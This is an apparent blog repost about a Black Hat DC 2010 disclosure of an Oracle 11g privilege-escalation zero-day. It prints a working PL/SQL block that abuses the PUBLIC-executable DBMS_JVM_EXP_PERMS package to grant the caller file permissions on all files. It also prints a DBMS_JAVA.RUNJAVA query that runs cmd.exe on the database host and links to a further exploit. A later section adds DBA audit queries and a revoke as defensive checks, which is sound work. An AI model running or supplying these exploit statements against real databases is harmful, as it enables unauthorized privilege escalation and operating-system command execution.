Thursday, February 11, 2010

Hacking Oracle 11g

David Litchfield's slides from Black Hat DC 2010 are now online. Here is the 0day from his slides, which works even on 11g R2:

Essentially, because of a flaw in the DBMS_JVM_EXP_PERMS package (executable by PUBLIC), any user with just the CREATE SESSION privilege can grant himself arbitrary Java permissions; the block below grants the caller a java.io.FilePermission on all files:

DECLARE
  -- a collection of Java policy rows in the shape IMPORT_JVM_PERMS expects
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  -- one row: kind, grantee (the current user), schema, permission type, name, action, enabled
  CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM dual;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  -- the package imports the row into the Java policy without checking who is calling
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/


Once the Java permission is in place, the user can simply create a Java stored procedure and execute OS commands from it (http://milw0rm.com/exploits/2837).

However, if the CREATE PROCEDURE privilege is not available, David has another way to execute OS commands, through DBMS_JAVA.RUNJAVA and the oracle/aurora/util/Wrapper class:

-- runs cmd.exe with the Java permission granted above and writes the directory listing to c:\out.lst
SELECT dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') FROM dual;
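The two vectors above both depend on a PUBLIC-executable package and leave a trace in the Java policy tables. The following DBA-side checks are an added example, not code from the slides or the original post; the views and procedures (DBA_TAB_PRIVS, DBA_JAVA_POLICY, DBMS_JAVA.DELETE_PERMISSION) are standard Oracle data dictionary objects, while the excluded grantees and the SEQ value 1234 are assumptions for illustration.

```sql
-- Added example: audit and clean up after the DBMS_JVM_EXP_PERMS / DBMS_JAVA.RUNJAVA vectors.
-- Run as a DBA.

-- 1. Who can call the two packages? The self-grant needs EXECUTE on DBMS_JVM_EXP_PERMS,
--    the RUNJAVA vector needs EXECUTE on DBMS_JAVA; both are granted to PUBLIC by default.
SELECT grantee, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBMS_JVM_EXP_PERMS', 'DBMS_JAVA')
 ORDER BY table_name, grantee;

-- 2. Has anyone already imported a blanket FilePermission for themselves?
--    The exploit row shows up with KIND = 'GRANT', GRANTEE = the attacking user,
--    PERMISSION_NAME = '<<ALL FILES>>'. Legitimate holders of that permission are
--    SYS and the JAVASYSPRIV role (assumed list; extend it for your site).
SELECT seq, kind, grantee, permission_type, permission_name, permission_action, enabled
  FROM dba_java_policy
 WHERE permission_type = 'java.io.FilePermission'
   AND permission_name = '<<ALL FILES>>'
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV')
 ORDER BY grantee, seq;

-- 3. Remove a rogue entry by the SEQ returned above (1234 is an assumed value)
--    and take the import package away from PUBLIC.
-- EXEC DBMS_JAVA.DELETE_PERMISSION(1234);
-- REVOKE EXECUTE ON SYS.DBMS_JVM_EXP_PERMS FROM PUBLIC;
```

Revoking EXECUTE on DBMS_JAVA from PUBLIC would also close the RUNJAVA vector, but Java stored procedures in applications commonly depend on it, so test that revoke before applying it. Neither check fixes the underlying flaw; that requires the vendor patch.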


The video of this presentation can be downloaded here.

Some said Black Hat had removed this video, but I was able to download it last week.
http://blog.red-database-security.com/2010/02/05/oracle-blackhat-video-removed-from-website/


Article from: http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/

Here is a related link on Hacking Oracle 11g:
http://www.favsky.com/computer/news/itworld/black-hat-zero-day-hack-of-oracle-11g-database-revealed.html
